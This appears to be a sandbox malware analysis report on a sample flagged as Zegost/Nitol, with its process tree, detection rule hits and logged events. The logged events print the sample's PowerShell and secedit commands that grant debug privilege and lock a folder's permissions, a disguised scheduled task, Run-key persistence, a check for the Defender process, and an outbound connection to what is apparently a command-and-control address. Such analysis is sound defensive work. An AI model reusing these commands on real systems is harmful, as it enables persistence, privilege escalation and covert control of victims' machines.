      • SecEdit.exe (PID: 7684 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
    • cmd.exe (PID: 4612 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8032 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 1164 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5136 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7200 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 984 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7748 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4292 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7908 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 828 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8068 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 3304 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5956 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 6472 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 5856 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7700 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7304 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6388 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 5612 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5660 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 1128 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3772 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7600 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3448 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 5716 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6776 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 4140 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4180 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 3664 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6036 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7752 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7964 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8092 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • svchost.exe (PID: 7544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Lets-x64.exe | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
Lets-x64.exe | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Program\ziliao.jpg | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
C:\ProgramData\Microsoft\Program\ziliao.jpg | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |

Source | Rule | Description | Author | Strings
0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
(4 more entries not shown)

Source | Rule | Description | Author | Strings
28.2.iusb3mon.exe.6240000.3.raw.unpack | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
28.2.iusb3mon.exe.6240000.3.raw.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
28.2.iusb3mon.exe.4d105bf.2.raw.unpack | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
28.2.iusb3mon.exe.4d105bf.2.raw.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
28.2.iusb3mon.exe.6640607.4.raw.unpack | JoeSecurity_Zegost | Yara detected Zegost | Joe Security |
(7 more entries not shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ParentImage: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentProcessId: 6104, ParentProcessName: _P18sPbB.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 5996, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , CommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, NewProcessName: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, OriginalFileName: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2952, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ProcessId: 6104, ProcessName: _P18sPbB.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ParentImage: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentProcessId: 6104, ParentProcessName: _P18sPbB.exe, ProcessCommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", ProcessId: 1088, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ParentImage: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentProcessId: 6104, ParentProcessName: _P18sPbB.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 5996, ProcessName: powershell.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 202.79.169.178, DestinationIsIpv6: false, DestinationPort: 25445, EventID: 3, Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, Initiated: true, ProcessId: 6104, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49741
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ProcessId: 6104, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ProcessId: 6104, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine|base64offset|contains: ~>z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003", ParentImage: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe, ParentProcessId: 320, ParentProcessName: irsetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, ProcessId: 5620, ProcessName: powershell.exe
